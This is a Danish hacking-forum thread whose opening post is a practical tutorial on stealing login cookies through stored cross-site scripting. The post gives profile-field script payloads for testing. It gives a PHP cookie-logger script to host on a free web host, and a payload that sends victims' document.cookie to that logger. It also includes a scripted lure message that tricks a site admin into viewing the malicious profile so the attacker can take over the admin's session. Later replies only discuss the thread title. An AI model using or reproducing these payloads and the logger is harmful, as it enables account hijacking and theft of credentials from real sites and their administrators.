Tråd bedømmelse:
  • 0 Stemmer - 0 Gennemsnit
  • 1
  • 2
  • 3
  • 4
  • 5
Cookie-stealing med XSS på sider med login
04-12-2013, 11:04 (Denne besked var sidst ændret: 04-12-2013, 14:32 af Lycia.)
#1
Cookie-stealing med XSS på sider med login
Hey ss! :D
I dag skal vi se lidt på at hacke lidt sites :D
Jeg er ikke ansvarlig for den måde i bruge den læring jeg giver jer.

Okay... Du skal bruge lidt viden inden for Cross site scripting også kaldet "XSS."
Jeg kan opfordre jeg til at se den her tråd til at starte med: https://www.shellsec.pw/showthread.php?tid=264

Vi skal nemlig benytte os af cookie stealing.
Hvad er cookie stealing?
Cookie stealing bliver brugt til at stjæle login information fra enten et udvalgt mål, eller en masse forskellige. Det gør man ved hjælp af XSS (croos site scripting.) Det får så target til at sende en forspørgesel til en side (vores cookie stealer) for så at stjæle cookien, og derefter blive vider stillet til en 3 sidde, dette kan ske uden brugern opdager noget som helst. En cookiestealer køre over JavaScript, dvs. at stort set alle elektroniske apperater kan bruges, bare der har javascript.

Test om den er vuln!
Godt, det første vi gør er at oprette en bruger på vores target (altså vores site) Lad os sige gustav.com/user/registre/
Vi laver så en bruger hvor vi giver nogle random oplysnigner (mail osv.)
Så skal vi så lidt igang.
Nu går du så ind og ændre dit navn under "Edit Profile" til:
Kode:
<script>window.location="http://shellsec.pw/"</script>
Tillader din sitet ikke det kan du evt. prøve det mest standart i xss, nemlig at få en alert frem, og som den artikel jeg linkede til kan vi så se det er:
Kode:
<script>alert("XSS")</script>
Nogle gange er der sat et filter på sådan så man ikke kan skrive det... Fin evt andre steder i din profil hvor du kan indsætte de codes.
Det kunne eks. være "Om dig (skriv en profil tekst)"
Godt, kommer shellsec's side op når du går ind på din bruger (hvis du bruger det første xss script jeg gav) så er den vuln, brugte du det andet xss script ejg gav skulle der gerne komme en alert boks op hvor der står "XSS"

Forberedelse til vores angreb
Nu skal vi så have sat vores cookiestealer op. Det gør vi sådan her:
1 Gå til 000webhoste og opret en bruger. Derefter gå til "File Manager"
Her trykker du så på "publich html" og sletter alt i mappen.
2 Nu åbner du et notepad dokoment og kopier følgende:
Kode:
<?php
function GetIP()
{
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
$ip = $_SERVER['REMOTE_ADDR'];
else
$ip = "unknown";
return($ip);
}
function logData()
{
$ipLog="log.txt";
$cookie = $_SERVER['QUERY_STRING'];
$register_globals = (bool) ini_get('register_gobals');
if ($register_globals) $ip = getenv('REMOTE_ADDR');
else $ip = GetIP();

$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date ("l dS of F Y h:i:s A");
$log=fopen("$ipLog", "a+");

if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie <br>");
else
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
fclose($log);
}
logData();
?>
Du gemmer det så som "lycia.php"
3:
Gå tilbage til 00webhoste og filemanager.
Du trykker så på "uploade file" og uploader så "lycia.php" nu går du så til din hjemmeside:
http://www.dinside.bla.bla.bla/lycia.php
Nu skulle der så gerne være kommet en fil i File Manager der hedder "log.txt"
Nu har vi sat vores cookie stealer op. Slet filen der hedder "log.txt"

Udnyttelse
Okay nu skal vi igang.
Gå ind kopier urlen fra din bruger, og edit så dit profil navn til:
Kode:
<script>location.href = 'http://www.dinside.bla.bla.bla/lycia.php?cookie='+document.cookie;</script>
Opret en ny profil hvor du kalder dig et eller andet, skriv fra den profil til admin noget alla:
Kode:
Hej admin jeg synes en bruger har nogle underlige udtagleser i hans profiltekst hvor i han skriver at han ikke kan lide "navn på forumet" og at han bare vil spame. Det er ham her: "link til den første bruger du lavede..."
Når admin så går ind på den bruger kommer der igen en "log.txt" fil i File Manager.
Nu indsætter vi så admins cookie i vores egen (Søg evt på hvordan man gør, der er en masse guides hvor man bruger det efter man eks har stjålet cookies på et nal netværk.
Lycia Out.
There is 3 rules for a life.
1. fuck.
2. Dont give a fuck.
3. Dont be fucked over
Find alle beskeder fra denne bruger
Citer denne besked i et svar
04-12-2013, 12:48
#2
RE: Hack sider med username og forums mm.
Jeg tror måske du skal gøre opmærksom på at det her hedder cookie stealing, så man kan finde det hvis man søger efter det. Skriv det i titlen og uddyb eventuelt i teksten.
Mangler du hjælp?
Regler |  E-mail (PGP)
Besøg denne brugers hjemmeside Find alle beskeder fra denne bruger
Citer denne besked i et svar
04-12-2013, 13:00
#3
RE: Hack sider med username og forums mm.
(04-12-2013, 11:04)Lycia Skrev: Vi skal nemlig benytte os af cookie stealing.
Test om den er vuln!

Skal nok udtrykke det mere, men synes ikke det skal uddybes så meget mere, for det er jo ikke ligefrem fordi du sidder og skal bruger hjernen vildt til det her..
There is 3 rules for a life.
1. fuck.
2. Dont give a fuck.
3. Dont be fucked over
Find alle beskeder fra denne bruger
Citer denne besked i et svar
04-12-2013, 13:58
#4
RE: Hack sider med username og forums mm.
(04-12-2013, 13:00)Lycia Skrev: Skal nok udtrykke det mere, men synes ikke det skal uddybes så meget mere, for det er jo ikke ligefrem fordi du sidder og skal bruger hjernen vildt til det her..

Nej, men der er jo mange der gerne vil vide hvad cookie-stealing er før de går i gang.
Jeg mener bare meget kort, 2 linjer, skrive at det handler om at sætte et script ind, ved hjælp af XSS, der får brugeren til at sende en request til en anden side, med vedkommendes cookie som parameter så man kan fange den.
Mangler du hjælp?
Regler |  E-mail (PGP)
Besøg denne brugers hjemmeside Find alle beskeder fra denne bruger
Citer denne besked i et svar
04-12-2013, 14:31
#5
RE: Cookie-stealing med XSS på sider med login
(04-12-2013, 13:58)Doctor Blue Skrev: Nej, men der er jo mange der gerne vil vide hvad cookie-stealing er før de går i gang.
Jeg mener bare meget kort, 2 linjer, skrive at det handler om at sætte et script ind, ved hjælp af XSS, der får brugeren til at sende en request til en anden side, med vedkommendes cookie som parameter så man kan fange den.

Done :D
There is 3 rules for a life.
1. fuck.
2. Dont give a fuck.
3. Dont be fucked over
Find alle beskeder fra denne bruger
Citer denne besked i et svar
« Ældre | Nyere »




User(s) browsing this thread: 1 Gæst(er)